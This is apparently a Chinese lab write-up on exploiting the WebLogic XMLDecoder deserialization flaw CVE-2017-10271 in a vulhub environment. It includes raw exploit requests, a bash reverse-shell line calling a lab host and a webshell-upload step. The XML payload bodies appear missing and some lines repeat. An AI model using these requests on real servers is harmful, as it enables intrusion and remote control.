【研究】weblogic漏洞系列XMLDecoder 反序列化漏洞（CVE-2017-10271）

1.环境

环境
https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md
这个搭环境很方便快捷，具体可以看说明，很简单

2.原理

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令

3.影响版本

Oracle WebLogic Server 10.3.6.0.0版本

Oracle WebLogic Server 12.1.3.0.0版本

Oracle WebLogic Server 12.2.1.1.0版本

4.利用过程

POC反弹shell
反弹shell的语句，需要进行编码，，否则解析XML的时候将出现格式错误

注意实验环境不能只有ip 还有端口 10.77.0.130:7001

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.77.0.130:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 634

 





/bin/bash


-c


bash -i >& /dev/tcp/10.77.0.58/666 0>&1

反弹SHell成功

访问：http://your-ip:7001/bea_wls_internal/test.jsp
写入webshell的POC
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.txt写文件。
文件名称为xxxx文件内容为xxxx
成功发送请求之后服务器会返回 500 status code。
需要注意的地方是头部必须加上Content-Type: text/xml请求会出错。

注意实验环境不能只有ip 还有端口 10.77.0.130:7001

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638


    
    
    
    
    
    
    

上传路径为http://10.77.0.130:7001/bea_wls_internal/tt.jsp

注意实验环境不能只有ip 还有端口 10.77.0.130:7001

注意实验环境不能只有ip 还有端口 10.77.0.130:7001